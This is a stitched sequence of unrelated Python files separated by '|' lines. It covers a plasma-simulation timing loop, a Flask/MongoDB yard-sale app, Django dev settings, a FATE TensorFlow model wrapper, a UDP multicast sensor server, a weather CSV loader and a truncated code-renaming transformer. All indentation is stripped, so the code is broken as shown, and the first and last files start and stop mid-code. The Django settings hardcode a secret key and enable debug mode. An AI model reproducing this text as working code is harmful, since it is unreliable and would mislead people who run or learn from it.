dtimer(dtime,itime,-1)
isign = -1
epois33(dcu,cus,isign,ffe,ax,ay,az,affp,wpm,ci,wf,nx,ny,nz,nxeh,
nye,nze,nxh,nyh,nzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
# transform transverse electric field to real space with standard
# procedure: updates cus
dtimer(dtime,itime,-1)
isign = 1
wfft3r3(cus,isign,mixup,sct,indx,indy,indz,nxeh,nye,nze,nxhyz,
nxyzh)
dtimer(dtime,itime,1)
time = float(dtime)
tfft = tfft + time
# copy guard cells with standard procedure: updates bxyze, cus
dtimer(dtime,itime,-1)
cguard3l(bxyze,nx,ny,nz,nxe,nye,nze)
cguard3l(cus,nx,ny,nz,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tguard = tguard + time
# add longitudinal and transverse electric fields with standard
# procedure: exyze = cus + fxyze, updates exyze
# cus needs to be retained for next time step
dtimer(dtime,itime,-1)
addvrfield3(exyze,cus,fxyze,ndim,nxe,nye,nze)
dtimer(dtime,itime,1)
time = float(dtime)
tfield = tfield + time
pass
# push particles with standard procedure: updates part, wke
wke[0] = 0.0
dtimer(dtime,itime,-1)
gbpush3l(part,exyze,bxyze,qbme,dt,dt,wke,idimp,np,nx,ny,nz,nxe,nye,
nze,ipbc)
dtimer(dtime,itime,1)
time = float(dtime)
tpush = tpush + time
# sort particles by cell for standard procedure
if (sortime > 0):
if (ntime%sortime==0):
dtimer(dtime,itime,-1)
dsortp3yzl(part,part2,npic,idimp,np,ny1,nyz1)
# exchange pointers
tpart = part
part = part2
part2 = tpart
dtimer(dtime,itime,1)
time = float(dtime)
tsort = tsort + time
pass
pass
if (ntime==0):
wt = we + wm
print "Initial Total Field, Kinetic and Total Energies:"
print "%14.7e %14.7e %14.7e" % (wt, wke, wke + wt)
print "Initial Electrostatic, Transverse Electric and Magnetic " \
"Field Energies:"
print "%14.7e %14.7e %14.7e" % (we, wf, wm)
ntime = ntime + 1
# * * * end main iteration loop * * *
print "ntime, ndc = ", ntime, ndc
wt = we + wm
print "Final Total Field, Kinetic and Total Energies:"
print "%14.7e %14.7e %14.7e" % (wt, wke, wke + wt)
print "Final Electrostatic, Transverse Electric and Magnetic Field " \
"Energies:"
print "%14.7e %14.7e %14.7e" % (we, wf, wm)
print ""
print "deposit time = ", tdpost
print "current deposit time = ", tdjpost
print "current derivative deposit time = ", tdcjpost
tdpost = tdpost + tdjpost + tdcjpost
print "total deposit time = ", tdpost
print "guard time = ", tguard
print "solver time = ", tfield
print "fft time = ", tfft
print "push time = ", tpush
print "sort time = ", tsort
tfield = tfield + tguard + tfft
print "total solver time = ", tfield
time = tdpost + tpush + tsort
print "total particle time = ", time
wt = time + tfield
print "total time = ", wt
print ""
wt = 1.0e+09/(float(nloop)*float(np))
print "Push Time (nsec) = ", tpush*wt
print "Deposit Time (nsec) = ", tdpost*wt
print "Sort Time (nsec) = ", tsort*wt
print "Total Particle Time (nsec) = ", time*wt
|
import os
import requests
import time
from os import path
from flask import Flask, render_template, redirect, request, url_for
from flask_pymongo import PyMongo
from flask_googlemaps import GoogleMaps
from bson.objectid import ObjectId
from datetime import date
# instatiate Flask application
app = Flask(__name__)
# Initialize the extension
GoogleMaps(app)
# import env.py
if path.exists('env.py'):
import env
# retrieve environment variables
app.config['MONGO_DBNAME'] = os.environ.get('MONGO_DBNAME')
app.config['MONGO_URI'] = os.environ.get('MONGO_URI')
app.config['GOOGLEMAPS_API_KEY'] = os.environ.get('GOOGLEMAPS_API_KEY')
googlemap_search_url = \
("https://maps.googleapis.com/maps/api/place/textsearch/json")
googlemap_details_url = \
("https://maps.googleapis.com/maps/api/place/details/json")
google_key = app.config['GOOGLEMAPS_API_KEY']
# instatiate Mongo application
mongo = PyMongo(app)
@app.route("/")
@app.route('/get_yardsales/', methods=["GET", "POST"])
def get_yardsales():
categories = mongo.db.categories.find()
# declare dictionary
searchcriteriadict = {}
if request.method == "POST":
# if form's returned value is not empty then add to dictionary /
yardsale_cat = request.form.get('categorysearch').capitalize()
if yardsale_cat != "":
if yardsale_cat == "All":
searchcriteriadict['category'] = \
{'$in': ['Estate', 'Garage', 'Community']}
else:
searchcriteriadict['category'] = yardsale_cat.capitalize()
else:
searchcriteriadict['category'] = \
{'$in': ['Estate', 'Garage', 'Community']}
yardsale_date = request.form.get('datesearch')
if yardsale_date != "":
searchcriteriadict['date'] = yardsale_date
# value in form "cityorzip" is either \
# the zip code or city
yardsale_cityorzip = request.form.get('cityorzipsearch')
if yardsale_cityorzip != "":
"""
check if there is matching document where form's value is equal\
to city. If found, then add to dictionary.\
Else, perform same search and action but for zip code
"""
if mongo.db.yard_sales.count_documents({'city':
yardsale_cityorzip}) > 0:
searchcriteriadict['city'] = yardsale_cityorzip
else:
if mongo.db.yard_sales.count_documents({'zip':
yardsale_cityorzip}) >\
0:
searchcriteriadict['zip'] = yardsale_cityorzip
yardsale_items = request.form.get('itemsearch').capitalize()
if yardsale_items != "":
searchcriteriadict['item_list'] = {'$in': [yardsale_items]}
if searchcriteriadict != {}:
search_results = mongo.db.yard_sales.find(searchcriteriadict)
yardsales_count = \
mongo.db.yard_sales.count_documents(searchcriteriadict)
return render_template('getyardsales.html',
yardsales=search_results,
categories=categories,
google_key=google_key,
yardsales_count=yardsales_count,
mode="search")
else:
return render_template('getyardsales.html',
yardsales_count=0, mode="search")
else:
today_date = date.today()
today_str = today_date.strftime("%Y-%m-%d")
yardsales = mongo.db.yard_sales.find({'date': today_str})
yardsales_count = yardsales.count()
return render_template('getyardsales.html',
yardsales=yardsales,
categories=categories,
google_key=google_key,
yardsales_count=yardsales_count, mode="all")
# route for the Add Yard Sales page (addyardsales.html)
@app.route('/add_yardsales', methods=["GET", "POST"])
def add_yardsales():
record_status = request.args.get('record_status')
countries = mongo.db.countries.find()
return render_template('addyardsales.html',
countries=countries, record_status=record_status)
# request addyardsales.html's form and insert it to the 'yard_sales' collection
@app.route('/insert_yardsale', methods=["GET", "POST"])
def insert_yardsale():
# first find/fetch yard_sale collection object
yardsales = mongo.db.yard_sales
# retrieve address from form in addyardsales.html
address_1 = request.form.get('address1')
address_2 = request.form.get('address2')
city = request.form.get('city')
state = request.form.get('state')
zip = request.form.get('zip')
full_addr = address_1 + address_2 + " " + city + " " + state + " " + zip
# pass in the address (to get_google_coord) \
# for which google coordinates are fetched from API's JSON
google_coor = get_google_coord(full_addr)
addr_lat = google_coor[0]
addr_long = google_coor[1]
itemlist_array = []
itemlist_array = request.form.getlist('itemlist')
itemlist_lwr = [i.capitalize() for i in itemlist_array]
yardsales.insert_one({
'seller_first_name': request.form.get('first_name'),
'seller_last_name': request.form.get('last_name'),
'seller_email': request.form.get('email'),
'item_list': itemlist_lwr,
'date': request.form.get('saledate'),
'time': request.form.get('saletime'),
'category': request.form.get('salecat').capitalize(),
'address_1': request.form.get('address1'),
'city': request.form.get('city'),
'state': request.form.get('state'),
'country_code': request.form.get('countrycode'),
'zip': request.form.get('zip'),
'lat': addr_lat,
'long': addr_long
})
record_status = "added"
return redirect(url_for('add_yardsales', record_status=record_status))
# getting coordinates
def get_google_coord(full_addr):
search_payload = {"key": google_key, "query": full_addr}
search_req = requests.get(googlemap_search_url, search_payload)
search_json = search_req.json()
time.sleep(.3)
latitude = search_json["results"][0]["geometry"]["location"]["lat"]
longitude = search_json["results"][0]["geometry"]["location"]["lng"]
coordinates = [latitude, longitude]
print(coordinates)
return coordinates
# route to page updatedeleteyardsales.html
@app.route('/updatedelete_yardsales',
methods=["GET", "POST"])
def updatedelete_yardsales():
# declare dictionary
searchdict = {}
if request.method == "POST":
# if form's returned value is not empty then add to dictionary
yardsale_date = request.form.get('datesearch')
if yardsale_date != "":
searchdict['date'] = yardsale_date
yardsale_fname = request.form.get('fnamesearch')
if yardsale_fname != "":
searchdict['seller_first_name'] = yardsale_fname
yardsale_lname = request.form.get('lnamesearch')
if yardsale_lname != "":
searchdict['seller_last_name'] = yardsale_lname
search_results = mongo.db.yard_sales.find(searchdict)
yardsales_count = mongo.db.yard_sales.count_documents(searchdict)
return render_template('updatedeleteyardsales.html',
yardsales=search_results, google_key=google_key,
yardsales_count=yardsales_count)
else:
return render_template('updatedeleteyardsales.html')
# rout to get countries and yardsale \
# data (using record id) and send to updatedsale.html
@app.route('/update_yardsale/<yardsale_id>/<record_status>')
def update_yardsale(yardsale_id, record_status):
countries = mongo.db.countries.find()
# fetch yardsale based on its id key
yardsale_upd = mongo.db.yard_sales.find_one({'_id': ObjectId(yardsale_id)})
return render_template('updateyardsale.html', countries=countries,
yardsale_upd=yardsale_upd, google_key=google_key,
record_status=record_status)
# route to save changes to yard_sales collection
@app.route('/save_yardsale/<yardsale_id>/<record_status>',
methods=["GET", "POST"])
def save_yardsale(yardsale_id, record_status):
yardsales = mongo.db.yard_sales
# retrieve address from form in addyardsales.html
address_1 = request.form.get('address1')
address_2 = request.form.get('address2')
city = request.form.get('city')
state = request.form.get('state')
zip = request.form.get('zip')
full_addr = address_1 + address_2 + " " + city + " " + state + " " + zip
# pass in the address (to get_google_coord) \
# for which google coordinates are fetch from API's JSON
google_coor = get_google_coord(full_addr)
addr_lat = google_coor[0]
addr_long = google_coor[1]
yardsales.update({'_id': ObjectId(yardsale_id)},
{
'seller_first_name': request.form.get('first_name'),
'seller_last_name': request.form.get('last_name'),
'seller_email': request.form.get('email'),
'item_list': request.form.getlist('itemlist'),
'date': request.form.get('saledate'),
'time': request.form.get('saletime'),
'category': request.form.get('salecat').capitalize(),
'address_1': request.form.get('address1'),
'city': request.form.get('city'),
'state': request.form.get('state'),
'country_code': request.form.get('countrycode'),
'zip': request.form.get('zip'),
'lat': addr_lat,
'long': addr_long
})
record_status = 'updated'
return render_template('updatedeleteyardsales.html',
record_status=record_status)
# route to delete yardsale record from colletion
@app.route('/delete_yardsale/<yardsale_id>/<record_status>')
def delete_yardsale(yardsale_id, record_status):
mongo.db.yard_sales.remove({'_id': ObjectId(yardsale_id)})
record_status = 'deleted'
return render_template('updatedeleteyardsales.html',
record_status=record_status)
# About us page route
@app.route('/about')
def about():
return render_template('about.html')
# Contact us page route
@app.route('/contact_us')
def contact_us():
return render_template('contact_us.html')
# 404 error page route
@app.errorhandler(404)
def page_error(error):
return render_template("404.html"), 404
if __name__ == '__main__':
app.run(host=os.environ.get('IP', '0.0.0.0'),
port=int(os.environ.get('PORT', "5000")),
debug=False)
|
"""
Django settings for django_tpq project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import environ
from os.path import join as pathjoin
ROOT = environ.Path(__file__) - 3
ENV = environ.Env()
environ.Env.read_env(pathjoin(str(ROOT), '.env'))
environ.Env.read_env(pathjoin(str(ROOT), '.env-version'))
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3vb(bmz7j4x$89g^@&s3#rx^0)hy4ih7w7hscioj%1aj62c%$1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'main',
'futures',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tpq.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_tpq.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': ENV.db(default='postgresql://django_tpq:password@localhost/django_tpq'),
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/var/tmp/django_cache',
'OPTIONS': {
# Necessary to allow stress test to complete.
'MAX_ENTRIES': 2000,
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# Project specific configuration.
FUTURES_QUEUE_NAME = 'futures.FutureQueue'
FUTURES_CACHE_BACKEND = 'default'
FUTURES_CACHE_TTL = 300
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import tensorflow as tf
from federatedml.framework.weights import OrderDictWeights
from federatedml.nn.homo_nn.nn_model import NNModel, DataConverter
class TFNNModel(NNModel):
def __init__(self, optimizer, loss, metrics, predict_ops):
self._optimizer = optimizer
self._loss = loss
if not isinstance(metrics, list):
metrics = [metrics]
self._metrics = {TFNNModel._trim_device_str(metric.name): metric for metric in metrics}
self._train_op = self._optimizer.minimize(self._loss)
self._sess = tf.Session()
self._sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver()
self._trainable_weights = {self._trim_device_str(v.name): v for v in
tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)}
self._predict_ops = predict_ops
@staticmethod
def _trim_device_str(name):
return name.split("/")[0]
def get_model_weights(self):
return OrderDictWeights(self._sess.run(self._trainable_weights))
def set_model_weights(self, weights):
unboxed = weights.unboxed
self._sess.run([tf.assign(v, unboxed[name]) for name, v in self._trainable_weights.items()])
def get_batch_evaluate(self, batch):
return self._sess.run(self._metrics, feed_dict=batch)
def train_batch(self, batch):
return self._sess.run(self._train_op, feed_dict=batch)
def train(self, data, **kwargs):
for batch in data:
self.train_batch(batch)
def evaluate(self, data, **kwargs):
total = {name: 0.0 for name in self._metrics}
for batch in data:
for k, v in self.get_batch_evaluate(batch).item():
total[k] += v
return total
def export_model(self):
frozen_graph_def = tf.graph_util.convert_variables_to_constants(
self._sess,
self._sess.graph_def,
[v.name.split(":")[0] for v in self._predict_ops.values()]
)
return frozen_graph_def.SerializeToString()
class TFFitDictData(object):
def __init__(self, data_instances, batch_size, **kwargs):
self.size = data_instances.count()
if self.size <= 0:
raise ValueError("empty data")
one_data = data_instances.first()
x_shape = one_data[1][0].shape
y_shape = one_data[1][1].shape
self.x = np.zeros((self.size, *x_shape))
self.y = np.zeros((self.size, *y_shape))
index = 0
for k, v in data_instances.collect():
self.x[index] = v[0]
self.y[index] = v[1]
index += 1
self.batch_size = batch_size
self.additional_kv = kwargs
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
start = self.batch_size * index
end = self.batch_size * (index + 1)
return dict(x=self.x[start: end], y=self.y[start: end], **self.additional_kv)
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
return int(np.ceil(self.size / float(self.batch_size)))
def __iter__(self):
"""Creates an infinite generator that iterate over the Sequence.
Yields:
Sequence items.
"""
while True:
for item in (self[i] for i in range(len(self))):
yield item
class TFFitDictDataConverter(DataConverter):
def convert(self, data, *args, **kwargs):
return TFFitDictData(data, *args, **kwargs)
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = "d01"
__email__ = "<EMAIL>"
__copyright__ = "Copyright (C) 2015-16, <NAME>"
__license__ = "MIT"
__version__ = "0.1.0"
__date__ = "2016-03-31"
# Created: 2015-03-21 24:00
import socket
import platform
import threading
from ..sensorInterface import SensorServerInterface, \
SensorStartException
from .sensor import Sensor
from .message import Id, MsgType, \
ProtocolViolation, APPConfigMessage, APPMessage
from ...person import Person
class SensorServer(Sensor, SensorServerInterface):
""" APP sensor server """
def __init__(self, settings=None):
if settings is None:
settings = {}
super(SensorServer, self).__init__(settings)
self._device_id = Id.SERVER
self._packet_wait = settings.get("packet_wait_timeout", 1.5)
""" Wait for a packet wait time
:type _packet_wait: float """
self._multicast_bind_port = settings.get(
"multicast_bind_port",
self._multicast_port
)
""" Listen at port for multicast messages
:type : int """
self._clients = {}
""" Map of registered clients """
self._key2deviceId = {}
""" key (ip:port) -> device_id lookup
:type : dict[unicode, unicode] """
# TODO sync access to clients
self._multicast_socket = None
""" Socket listening for multicast messages
:type : socket.socket """
# Use event additionally to is_running to wait on it
self._is_stopped = threading.Event()
""" Class is stopping event """
def _packet_loop(self):
"""
Loop (while running) the inbox and handle incoming packages
:rtype: None
"""
while not self._is_stopped.is_set():
if self.inbox.empty() and \
not self.new_packet.wait(self._packet_wait):
continue
ip, port, packet = self.inbox.get()
if self.inbox.empty():
self.new_packet.clear()
self._do_packet(packet, ip, port)
def _do_packet(self, packet, ip, port):
"""
React to incoming packet
:param packet: Packet to handle
:type packet: T >= paps.si.app.message.APPMessage
:param ip: Client ip address
:type ip: unicode
:param port: Client port
:type port: int
:rtype: None
"""
msg_type = packet.header.message_type
if msg_type == MsgType.JOIN:
self._do_join_packet(packet, ip, port)
elif msg_type == MsgType.UNJOIN:
self._do_unjoin_packet(packet, ip, port)
elif msg_type == MsgType.UPDATE:
self._do_update_packet(packet, ip, port)
def _do_join_packet(self, packet, ip, port):
"""
React to join packet - add a client to this server
:param packet: Packet from client that wants to join
:type packet: paps.si.app.message.APPJoinMessage
:param ip: Client ip address
:type ip: unicode
:param port: Client port
:type port: int
:rtype: None
"""
self.debug("()")
device_id = packet.header.device_id
key = u"{}:{}".format(ip, port)
if device_id == Id.REQUEST:
device_id = self._new_device_id(key)
client = self._clients.get(device_id, {})
data = {}
if packet.payload:
try:
data = packet.payload
except:
data = {}
client['device_id'] = device_id
client['key'] = key
people = []
try:
for index, person_dict in enumerate(data['people']):
person = Person()
person.from_dict(person_dict)
person.id = u"{}.{}".format(device_id, person.id)
# To get original id -> id.split('.')[0]
people.append(person)
self.changer.on_person_new(people)
except:
self.exception("Failed to update people")
return
# Original ids (without device id)
client['people'] = people
# Add config to client data?
client_dict = dict(client)
del client_dict['people']
self._send_packet(ip, port, APPConfigMessage(payload=client_dict))
self._clients[device_id] = client
self._key2deviceId[key] = device_id
def _do_unjoin_packet(self, packet, ip, port):
"""
React to unjoin packet - remove a client from this server
:param packet: Packet from client that wants to join
:type packet: paps.si.app.message.APPJoinMessage
:param ip: Client ip address
:type ip: unicode
:param port: Client port
:type port: int
:rtype: None
"""
self.debug("()")
device_id = packet.header.device_id
if device_id <= Id.SERVER:
self.error("ProtocolViolation: Invalid device id")
return
client = self._clients.get(device_id)
if not client:
self.error("ProtocolViolation: Client is not registered")
return
key = u"{}:{}".format(ip, port)
if client['key'] != key:
self.error(
u"ProtocolViolation: Client key ({}) has changed: {}".format(
client['key'], key
)
)
return
# Packet info seems ok
try:
self.changer.on_person_leave(client['people'])
except:
self.exception("Failed to remove people")
return
# Forget client?
del self._clients[device_id]
del self._key2deviceId[key]
del client
def _do_update_packet(self, packet, ip, port):
"""
React to update packet - people/person on a device have changed
:param packet: Packet from client with changes
:type packet: paps.si.app.message.APPUpdateMessage
:param ip: Client ip address
:type ip: unicode
:param port: Client port
:type port: int
:rtype: None
"""
self.debug("()")
device_id = packet.header.device_id
if device_id <= Id.SERVER:
self.error("ProtocolViolation: Invalid device id")
return
client = self._clients.get(device_id, None)
if not client:
self.error("ProtocolViolation: Client is not registered")
return
key = u"{}:{}".format(ip, port)
if client['key'] != key:
self.error(
u"ProtocolViolation: Client key ({}) has changed: {}".format(
client['key'], key
)
)
return
# Packet info seems ok
try:
people = packet.people()
except ProtocolViolation:
self.exception("Failed to decode people from packet")
return
# Verify same number of people in update as registered to client
# (APP specific)
if len(people) != len(client['people']):
self.error("ProtocolViolation: Incorrect number of people updated")
changed = []
# Add ids to all people
# Assumes same order here as on the client (e.g from the join())
for index, person in enumerate(people):
old = client['people'][index]
person.id = old.id
if person != old:
old.sitting = person.sitting
# Maybe sent person to protect access to local saved state
changed.append(old)
if changed:
# Only update if there is really a change
try:
self.changer.on_person_update(changed)
except:
self.exception("Failed to notify people update")
return
else:
self.debug("No people updated")
def _new_device_id(self, key):
"""
Generate a new device id or return existing device id for key
:param key: Key for device
:type key: unicode
:return: The device id
:rtype: int
"""
device_id = Id.SERVER + 1
if key in self._key2deviceId:
return self._key2deviceId[key]
while device_id in self._clients:
device_id += 1
return device_id
def _init_multicast_socket(self):
"""
Init multicast socket
:rtype: None
"""
self.debug("()")
# Create a UDP socket
self._multicast_socket = socket.socket(
socket.AF_INET,
socket.SOCK_DGRAM
)
# Allow reuse of addresses
self._multicast_socket.setsockopt(
socket.SOL_SOCKET,
socket.SO_REUSEADDR,
1
)
# Set multicast interface to local_ip
self._multicast_socket.setsockopt(
socket.IPPROTO_IP,
socket.IP_MULTICAST_IF,
socket.inet_aton(self._multicast_ip)
)
# Set multicast time-to-live
# Should keep our multicast packets from escaping the local network
self._multicast_socket.setsockopt(
socket.IPPROTO_IP,
socket.IP_MULTICAST_TTL,
self._multicast_ttl
)
self._add_membership_multicast_socket()
# Bind socket
if platform.system().lower() == "darwin":
self._multicast_socket.bind(("0.0.0.0", self._multicast_bind_port))
else:
self._multicast_socket.bind(
(self._multicast_ip, self._multicast_bind_port)
)
self._listening.append(self._multicast_socket)
def _shutdown_multicast_socket(self):
"""
Shutdown multicast socket
:rtype: None
"""
self.debug("()")
self._drop_membership_multicast_socket()
self._listening.remove(self._multicast_socket)
self._multicast_socket.close()
self._multicast_socket = None
def _add_membership_multicast_socket(self):
"""
Make membership request to multicast
:rtype: None
"""
self._membership_request = socket.inet_aton(self._multicast_group) \
+ socket.inet_aton(self._multicast_ip)
# Send add membership request to socket
# See http://www.tldp.org/HOWTO/Multicast-HOWTO-6.html
# for explanation of sockopts
self._multicast_socket.setsockopt(
socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
self._membership_request
)
def _drop_membership_multicast_socket(self):
"""
Drop membership to multicast
:rtype: None
"""
# Leave group
self._multicast_socket.setsockopt(
socket.IPPROTO_IP,
socket.IP_DROP_MEMBERSHIP,
self._membership_request
)
self._membership_request = None
def start(self, blocking=False):
"""
Start the interface
:param blocking: Should the call block until stop() is called
(default: False)
:type blocking: bool
:rtype: None
:raises SensorStartException: Failed to start
"""
self.debug("()")
try:
self._init_multicast_socket()
except:
self._multicast_socket = None
self.exception("Failed to init multicast socket")
raise SensorStartException("Multicast socket init failed")
super(SensorServer, self).start(blocking=False)
self._is_stopped.clear()
try:
a_thread = threading.Thread(
target=self._thread_wrapper,
args=(self._packet_loop,)
)
a_thread.daemon = True
a_thread.start()
except:
self.exception("Failed to run packet loop")
raise SensorStartException("Packet loop failed")
self.info("Started")
# Blocking
super(Sensor, self).start(blocking)
def stop(self):
"""
Stop the sensor server (soft stop - signal packet loop to stop)
Warning: Is non blocking (server might still do something after this!)
:rtype: None
"""
self.debug("()")
super(SensorServer, self).stop()
# No new clients
if self._multicast_socket is not None:
self._shutdown_multicast_socket()
# Signal packet loop to shutdown
self._is_stopped.set()
|
# -*- coding: utf-8 -*-
#
# # <NAME>
# # Kotel'nikov Institute of Radio-engineering and Electronics of RAS
# # 2019
#
import csv
import regex as re
import os
import sys
from collections import defaultdict
from settings import Settings
from termcolor import colored
# Функция ищет все файлы с именем f во всех подкаталогах каталога catalog
def __find_files(catalog, f) -> list:
found_files = []
for root, dirs, files in os.walk(catalog):
found_files += [os.path.join(root, name) for name in files if name == f]
return found_files
def load(MeteoData, base=Settings.meteoBaseDir) -> None:
print('Wait...')
# base = './w/'
# MeteoData = ['meteo_1_2017-01-01_2019-09-01.csv', 'meteo_2_2017-01-01_2019-09-01.csv']
if not os.path.exists(base):
for i, csvpath in enumerate(MeteoData):
with open(csvpath, 'r') as csvfile:
MeteoDataReader = csv.reader(csvfile, delimiter=',')
for k, row in enumerate(MeteoDataReader):
if not k:
continue
data = re.split('[/ ]', row[0]) + row[1:7]
# data[0] -- year (YYYY)
# data[1] -- month (MM)
# data[2] -- day (DD)
# data[3] -- time (hh:mm)
# data[4] -- pressure
# data[5] -- temperature
# data[6] -- humidity
# data[7] -- wind speed
# data[8] -- rain rate
if not os.path.isdir(os.path.join(base, data[0])):
os.makedirs(os.path.join(base, data[0]))
if not os.path.isdir(os.path.join(base, data[0], data[1])):
os.makedirs(os.path.join(base, data[0], data[1]))
if not os.path.isdir(os.path.join(base, data[0], data[1], data[2])):
os.makedirs(os.path.join(base, data[0], data[1], data[2]))
filePath = os.path.join(base, data[0], data[1], data[2], 'data')
with open(filePath, 'a') as file:
file.write(data[3] + ' ' + data[4] + ' ' + data[5] + ' ' +
data[6] + ' ' + data[7] + ' ' + data[8] + '\n')
if not(k % 1000):
sys.stdout.write("Strings processed: %dк \r" % (k//1000))
sys.stdout.flush()
print('\nMeteostation #{}\t'.format(i+1) + '[' + colored('OK', 'green') + ']')
print('Additional operations...')
deleted = 0
DataList = __find_files(base, 'data')
for datapath in DataList:
print('{}\tProcessing...'.format(datapath))
DATA = defaultdict(list)
with open(datapath, 'r') as datafile:
for row in datafile:
data = re.split(' ', re.sub('\n', '', row))
# data[0] -- time (hh:mm)
# data[1] -- pressure
# data[2] -- temperature
# data[3] -- humidity
# data[4] -- wind speed
# data[5] -- rain rate
DATA[data[0]].append(data)
i = 0
for time in DATA.keys():
if len(DATA[time]) > 1:
i += 1
sdata = []
for item in DATA[time]:
if len(item) == 6:
sdata = item[:]
try:
P, T, Hum, Wind, RainRt, k = 0., 0., 0., 0., 0., 0
for data in DATA[time]:
P += float(data[1])
T += float(data[2])
Hum += float(data[3])
Wind += float(data[4])
RainRt += float(data[5])
k += 1
P /= k
T /= k
Hum /= k
Wind /= k
RainRt /= k
data = ['{:.3f}'.format(time), '{:.3f}'.format(P), '{:.3f}'.format(T),
'{:.3f}'.format(Hum), '{:.3f}'.format(Wind), '{:.3f}'.format(RainRt)]
DATA[time].clear()
DATA[time].append(data)
except ValueError:
if sdata:
DATA[time].clear()
DATA[time].append(sdata)
else:
deleted += len(DATA[time])
del DATA[time]
continue
if i:
print('Duplicated timestamps: {}'.format(i))
with open(datapath, 'w') as datafile:
for time in sorted(DATA.keys()):
for data in DATA[time]:
datafile.write(time + ' ' + data[1] + ' ' + data[2] + ' ' +
data[3] + ' ' + data[4] + ' ' +
data[5] + '\n')
DATA.clear()
print('{} timestamps are completely removed'.format(deleted))
print('Weather database\t['+colored('OK', 'green')+']')
return
def delete():
if os.path.exists(Settings.meteoBaseDir):
for root, dirs, files in os.walk(Settings.meteoBaseDir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
os.rmdir(Settings.meteoBaseDir)
print('Removing weather database\t' + '[' + colored('OK', 'green') + ']')
return
|
"""
Contains the "RenameVariableTransformer" that renames a variable and all its uses.
"""
import random
from abc import ABC
import logging as log
import libcst as cst
from libcst import CSTNode
from lampion.transformers.basetransformer import BaseTransformer
from lampion.utils.naming import get_random_string, get_pseudo_random_string
class RenameVariableTransformer(BaseTransformer, ABC):
"""
Transformer that renames a random local variable with a random name.
The variable is renamed at all places, that means it will also be changed at
different locations if things happen to be named the same.
TODO: This could lead to problems if people name variables like methods?
This transformer will not be applied if there are no assigned variables.
Class-Attributes, or attributes in private / sub-classes are valid targets for change too.
Before:
> def hi():
> some = 5
> thing = 3
> return some + thing
After:
> def hi():
> whnpwhenpwh = 5
> thing = 3
> return whnpwhenpwh + thing
"""
def __init__(self, string_randomness: str = "pseudo", max_tries:int = 75):
if string_randomness in ["pseudo", "full"]:
self.__string_randomness = string_randomness
else:
raise ValueError("Unrecognized Value for String Randomness, supported are pseudo and full")
self._worked = False
self.set_max_tries(max_tries)
log.info("RenameVariableTransformer created (%d Re-Tries)",self.get_max_tries())
def apply(self, cst_to_alter: CSTNode) -> CSTNode:
"""
Apply the transformer to the given CST.
Returns the original CST on failure or error.
Check the function "worked()" whether the transformer was applied.
:param cst_to_alter: The CST to alter.
:return: The altered CST or the original CST on failure.
Also, see the BaseTransformers notes if you want to implement your own.
"""
visitor = self.__VariableCollector()
altered_cst = cst_to_alter
tries: int = 0
max_tries: int = self.get_max_tries()
while (not self._worked) and tries <= max_tries:
try:
cst_to_alter.visit(visitor)
self._worked = visitor.finished
seen_names = list({x.target.value for x in visitor.seen_variables})
